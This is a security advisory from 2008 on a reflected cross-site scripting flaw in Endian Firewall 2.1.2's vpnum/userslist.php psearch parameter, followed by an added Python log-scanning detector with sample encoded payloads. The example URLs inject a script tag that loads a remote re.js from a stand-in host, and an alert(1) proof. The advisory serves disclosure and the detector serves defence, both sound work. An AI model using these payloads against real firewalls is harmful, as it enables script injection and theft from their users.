The Endian Firewall version 2.1.2 suffers from a cross site scripting vulnerability.
2761b01b4d40f21655e1a04883fb4031535e7c3d2f8e353ff184c18217f2aae1
#Security Advisory - Multiple Vulnerabilities in Endian firewall#
Endian Firewall is a "turn-key" Linux security distribution that turns every system into a full-featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : 01-28-2008
Product : Endian Firewall
Version : 2.1.2 - Prior versions may also be affected
Vendor : https://www.endian.com/en/
Author : syniack
Contact : syniack@gmail.com
S.Page : https://bsecure.net.pk
XSS Vulnerability: [TESTED]
Security issue in the following file:
vpnum/userslist.php?psearch=xss
Example:
https://www.example.com/vpnum/userslist.php?psearch="><script src=https://www.example2.com/re.js></script>
https://www.example.com/vpnum/userslist.php?psearch="><script>alert(1);</script>
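Detection example (added here, not part of the original advisory or of Endian's code): a log check that flags requests to vpnum/userslist.php whose psearch value decodes to HTML markup, including double-encoded values. The combined access-log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_PATH = "/vpnum/userslist.php"   # file named in the advisory
TARGET_PARAM = "psearch"               # parameter named in the advisory
# Characters that let a value close an HTML attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\']')

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C) for up to max_rounds passes."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_psearch(log_line):
    """Return the decoded psearch value if it carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith(TARGET_PATH):
        return None
    # parse_qs already removes one layer of percent-encoding.
    for raw in parse_qs(url.query, keep_blank_values=True).get(TARGET_PARAM, []):
        value = decode_fully(raw)
        if MARKUP_RE.search(value):
            return value
    return None

def scan(lines):
    """Collect every flagged psearch value from an iterable of log lines."""
    return [v for v in map(suspicious_psearch, lines) if v is not None]

SAMPLE_LOG = [  # constructed log lines, not taken from a real appliance
    '192.0.2.10 - - [28/Jan/2008:10:00:01 +0000] "GET /vpnum/userslist.php?psearch=alice HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Jan/2008:10:02:13 +0000] "GET /vpnum/userslist.php?psearch=%22%3E%3Cscript%3Ealert(1)%3B%3C/script%3E HTTP/1.1" 200 5311',
    '192.0.2.44 - - [28/Jan/2008:10:02:40 +0000] "GET /vpnum/userslist.php?psearch=%2522%253E%253Cscript%253E HTTP/1.1" 200 5290',
    '192.0.2.10 - - [28/Jan/2008:10:03:02 +0000] "GET /index.php?psearch=%3Cb%3E HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("psearch carries markup:", hit)
```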